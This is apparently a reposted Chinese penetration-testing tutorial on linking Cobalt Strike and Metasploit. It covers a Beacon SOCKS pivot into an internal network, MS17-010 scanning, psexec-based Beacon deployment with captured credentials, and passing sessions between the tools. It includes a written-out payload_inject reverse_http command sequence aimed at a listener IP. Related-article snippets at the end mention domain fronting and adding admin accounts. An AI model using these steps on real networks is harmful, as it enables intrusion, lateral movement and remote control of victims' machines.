CobalStrike 与 Metasploit实战联动

VSole2022-03-19 06:54:46

前言

CobalStrike 与 Metasploit 均是渗透利器,各有所长。前者更适合做稳控平台,后者则更擅长内网各类探测搜集与漏洞利用。

两者更需要灵活的联动,各自相互依托,从而提升渗透的效率。

内置Socks功能

通过Beacon内置的socks功能在VPS上开启代理端口,打通目标内网通道,之后将本地Metasploit直接带入目标内网,进行横向渗透。

当然,也可以把代理设置在其他的工具上,不限于Proxychains、Proxifier等。

首先,到已控目标机的Beacon下将socks代理开启。

1
beacon > socks 1024 #端口根据VPS实际情况进行设置

点开菜单栏中的View > Proxy Pivots,复制代理连接到Metasploit中。

本地启动Metasploit,挂上代理,就可以对目标内网进行各种探测搜集。


如 探测目标内网中存在MS17_010漏洞的主机,这也是内网拿主机权限利用方式之一。


利用MSF模块上线Beacon shell

当通过其它方式拿到了目标内网中某台Windows机器的本地管理员明文密码或hash时,可利用Metasploit下auxiliary/admin/smb/psexec_command模块,直接上线指定目标机器的Beacon shell。(前提目标机可出网)


先利用CobalStrike生成上线Beacon的powershell。

本地启动Metasploit,挂上代理,设置psexec_command模块参数。



最终,只要密码一致、 能出网,且未被杀软阻止的均会成功上线。

CS与MSF会话互传

CobaltStrike派生Metasploit

当CobaltStrike获得了一个上线机器,想把这个目标传给Metasploit中的meterpreter,获得一个session进行控制。

在Metasploit执行以下命令:

之后使用CobaltStrike创建一个windows/foreign/reverse_tcp的Listener。

其中IP为Metasploit的监听地址,端口为Metasploit所监听的端口。


然后选中计算机,右键->Spawn:选择MSF的监听器:


这个时候可以看到,Metasploit上的监听已经上线,现在可以对meterpreter获得的session进行控制。

Metasploit派生CobaltStrike

现在已经获得了一个meterpreter的session,把session传给CobaltStrike。

在CobaltStrike中创建一个监听者,和上一步类似,这里host需要修改为CobaltStrike客户端IP,创建好之后便监听8099端口,等待着被控机连接。

接下来,把meterpreter获得的session转交给CobaltStrike,在Metasploit执行以下命令:


1
meterpreter > background
2
msf5 > use exploit/windows/local/payload_inject
3
msf5 > set payload windows/meterpreter/reverse_http
4
msf5 > set lhost 192.168.144.174
5
msf5 > set lport 8099
6
msf5 > set DisablePayloadHandler true
7
msf5 > set session 1
8
msf5 > run

解释一下这些参数。

由于CobaltStrike的监听器我们使用的是:

windows/beacon_http/reverse_http

所以我们的payload也要使用:

payload windows/meterpreter/reverse_http

设置本地监听IP和端口:由于监听器是CobaltStrike的,所以要设置成CobaltStrike机器的IP与端口。

默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,这里我们设置:

set DisablePayloadHandler true

设置当前的session,执行run。

此时目标机便已成功从CobaltStrike上线。


总结

关于CobalStrike与Metasploit 的联动利用方式远不止这些,每种方式在实战中都有对应的应用场景,更需要探索与总结。

在测试过程中详细的信息收集意味着不同的渗透测试路线,也只有信息的关联使用和复用才能更加有效的放大渗透成果。

metasploitsession
本作品采用《CC 协议》,转载必须注明作者和本文链接
最后的功能是支持 7.3.3 版本之前和之后的两种解密算法,并且支持 Passphrase 解密(前提是你要知道用户设置的 Passphrase),这次主要学习了一个河豚解密算法的编写。旧版本的加解密算法正是使用了河豚算法,这个算法比较容易恢复明文密码,所以新版本添加了 Passphrase 的 SHA256 数据摘要作为 AES-256-CBC 算法的 Key,增加了解密难度,和 Xshell 的主密码一样。
本文为内测第一周结束后内网学员的学习笔记,后续本公众号会持续更新其他课程学员学习笔记。对课程感兴趣,请添加文末小助手微信咨询。0x01 MSF安装和升级 最近mac本机和linux服务器上的msf在执行msfupdate命令以后都出现了不同程度的玄学问题,于是卸了重装。
前言 CobalStrike 与 Metasploit 均是渗透利器,各有所长。前者更适合做稳控平台,后者则更擅长内网各类探测搜集与漏洞利用。 两者更需要灵活的联动,各自相互依托,从而提升渗透的效率。 内置Socks功能 通过Beacon内置的socks功能在VPS上开启代理端口,打通目标内网通道,之后将本地Metasploit直接带入目标内网,进行横向渗透。 当然,也可以把代理设置在其他的
可以通过Meterpreter的客户端执行攻击脚本,远程调用目标主机上运行的Meterpreter服务端。
CobaltStrike与MSF联动
2021-11-18 07:52:49
CobalStrike更适合做个稳控平台,轻型的远控工具,内置Windows系统类模块较多,Metasploit更擅长各类内网搜集和漏洞利用,包含多类型操作系统模块,但是使用起来“比较笨重”。
无论对于是平时出于各种目的游走在网页和服务器中的黑客,还是从事网络安全测试的安全人员来说,一个好的漏洞框架发挥的作用不言而喻。
本文详细介绍在metasploit-framework中云函数的使用方法及相关技巧,希望通过本文能够对红队同学在红蓝对抗过程中有所帮助。或者设置对应告警,一旦红队人员使用云函数上线,防守方马上就能定位到哪台机器已经失陷,然后修复漏洞。session 1是使用云函数上线时的效果,只能获取到云函数的网关IP。
CS 域前置+流量混淆
2021-10-14 06:58:22
域前置(Domain Fronting)被称为域前端网络攻击技术,是一种隐藏连接真实端点来规避互联网审查的技术。这种技术被安全人员多用来隐藏 Metasploit,Cobalt Strike 等团队控制服务器流量, 以此来一定程度绕过检查器或防火墙检测的技术,国内外如:Amazon ,Google,Akamai 等大型厂商都会提供一些域前端技术服务。
VulnHub 靶机渗透之 DC-1
2021-03-11 14:30:45
2,可以直接在网上查询Drupal的漏洞利用。3,使用metasploit对漏洞进行利用msfconsole启动metasploit,搜索drupal模块。4,excellent级别最新的drupalgeddon2这个exploit尝试攻击。6,找到flag1,提示查看Drupal的配置文件,这个配置文件必须要关注,一般可以从内容中得到数据库用户名及密码。11,找到了一个users表,猜测应该是和登录账号有关。13,这里利用exploitdb中有一个Drupal7的攻击脚本,可以增加一个admin权限的账号。
msf提权简单利用
2023-06-06 09:03:11
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。将创建的用户添加到远程连接组net localgroup Administrators username /add 将创建的用户添加到管理员组然后即可通过远程登录进入本机进行远程连接至此实验成功!
VSole
网络安全专家